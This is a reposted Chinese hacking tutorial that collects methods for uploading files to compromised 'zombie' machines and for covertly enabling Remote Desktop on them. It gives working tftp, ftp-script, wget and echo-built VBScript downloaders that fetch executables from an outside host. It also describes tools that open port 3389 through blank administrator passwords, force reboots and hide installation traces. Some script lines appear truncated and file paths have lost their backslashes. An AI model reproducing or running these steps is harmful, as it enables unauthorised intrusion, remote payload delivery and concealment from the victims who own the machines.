上传方法总结(转贴)


上传方法总结[对入侵很实用]- -


前段时间很多朋友在留言本上提出关于上传的问题,现在将本人用于上传的方法进行汇总如下,希望能够对初学者有所帮助:

一. tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

二. ftp法
肉鸡cmd中执行:
echo open ftp服务器ip [端口]>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt

三. 工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget 网站/sample.exe

四. 利用dl.vbe法
肉鸡cmd中执行:
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

五. 利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echo ilocal = lcase(wscript.arguments(1)) >iget.vbe
echo iremote = lcase(wscript.arguments(0)) >>iget.vbe
echo set xpost = createobject("microsoft.xmlhttp") >>iget.vbe
echo xpost.open "get",iremote,0 >>iget.vbe
echo xpost.send() >>iget.vbe
echo set sget = createobject("adodb.stream") >>iget.vbe
echo sget.mode = 3 >>iget.vbe
echo sget.type = 1 >>iget.vbe
echo sget.open() >>iget.vbe
echo sget.write(xpost.resp >>iget.vbe
echo sget.savetofile ilocal,2 >>iget.vbe

cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

六. 利用http网站vbe法
echo set xpost = createobject("microsoft.xmlhttp") >dsa.vbe
echo xpost.open "get","http://*.*.*.*/sample.exe",0 >>dsa.vbe
echo xpost.send() >>dsa.vbe
echo set sget = createobject("adodb.stream") >>dsa.vbe
echo sget.mode = 3 >>dsa.vbe
echo sget.type = 1 >>dsa.vbe
echo sget.open() >>dsa.vbe
echo sget.write(xpost.resp >>dsa.vbe
echo sget.savetofile "sample.exe",2 >>dsa.vbe

cscript dsa.vbe
del dsa.vbe

七. 3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)


那么怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用:
1,打开记事本,编辑内容如下:
echo [comp > c:sql
echo tsenable = on >> c:sql
sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
编辑好后存为bat文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。

2 (对xp2000都有效) 脚本文件 本地开3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

c:>cscript rots.vbs <目标ip> <用户名> <密码> [服务端口] [自动重起选项]

服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。

比如扫描到了一个有nt弱口令的服务器,ip地址是222.222.222.222,管理员帐户是administrator,密码为空
运行cmd(2000下的dos),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是ip,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)

脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。

如果要对本地使用,ip地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。

脚本访问的目标的135端口,如果目标135端口未开放,或者wmi服务关闭,那么脚本就没用了。


3,下载3389自动安装程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
说明:
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:winnttemp下,然后进入c:winnttemp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!

特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:winnttemp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版!

5,下载dameware nt utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方ip用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后ok。


你可能感兴趣的:(总结,职场,上传,休闲)